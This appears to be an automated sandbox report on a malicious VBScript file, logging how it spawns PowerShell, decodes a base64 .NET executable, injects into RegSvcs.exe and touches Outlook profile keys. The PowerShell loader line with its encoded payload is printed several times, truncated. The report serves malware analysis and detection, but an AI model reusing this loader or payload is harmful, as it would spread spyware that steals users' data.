Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@6/3@3/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"

Source: wscript.exe, 00000000.00000002.302919745.000001D52AC98000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAA", "false")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALAZ+mMAAAAAAAAAAOAAAiELAVAAACYAAAAGAAAAAAAAskQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBEAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAuCQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACURAAAAAAAAEgAAAACAAUAxCgAAOQaAAADAAAAAAAAAKhDAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABMwBABAAAAAAQAAEXIhAABwCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBsAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBiobMAoABQQAAAIAABFylQAAcAIoIQAACgwWKwEWRQMAAAACAAAADQAAABgAAAArIRID/hUPAAACFyviEgT+FQ4AAAIYK9cSAxZ9GAAABBkrzBID0A8AAAIoDwAACigiAAAKuH0NAAAEAygjAAAKLQ0IcqEAAHADKCQAAAoMAgh+JQAACn4lAAAKFhp+JQAAChQSAxIEKBAAAAYtBnMmAAAKegQfPCgnAAAKEwUWKwEWRRQAAAAFAAAAFQAAACQAAAAzAAAAdAAAAMAAAADTAAAA8gAAAAIBAABQAQAAZQEAAG8BAACIAQAAnAEAALABAADIAQAA3gEAAA0CAAAsAgAAXQIAADhxAgAABBEFHzTWKCcAAAoTBhcrliCzAAAAjQkAAAETBxgrhxEHFiACAAEAnhk4eP///ygoAAAKGjMWEQR7CgAABBEHKBEAAAYtHHMmAAAKehEEewoAAAQRBygSAAAGLQZzJgAACnoRBx8plBMIGjg3////EQR7CQAABBEIHtYSCRoSASgVAAAGLQZzJgAACnoRBhEJMxYRBHsJAAAEEQkoFwAABiwGcyYAAAp6BBEFH1DWKCcAAAoTChs46/7//wQRBR9U1ignAAAKEwscONj+//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHTi5/v//BS0lEQ0tIRcTDB44qf7//xEEewkAAAQWEQogADAAAB9AKBgAAAYTDRENLQZzJgAACnoRBHsJAAAEEQ0EEQsSASgWAAAGLQZzJgAACnoRBSD4AAAA1hMOHwk4W/7//wQRBRzWKCkAAAoX2hMRHwo4Rv7//xYTEh8LODz+//84nwAAAAQRDh8M1ignAAAKExMfDDgj/v//BBEOHxDWKCcAAAoTFB8NOA/+//8EEQ4fFNYoJwAAChMVHw44+/3//xEULEsRFBfaF9aNGwAAARMWHw844/3//wQRFREWFhEWjmkoKgAACh8QOM39//8RBHsJAAAEEQ0RE9YRFhEWjmkSASgWAAAGLQZzJgAACnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyK			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFCF92 push esp; iretd	3_2_05CFD1CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFF588 pushad ; iretd	3_2_05CFF915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05CFED90 pushad ; iretd	3_2_05CFEEBD

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
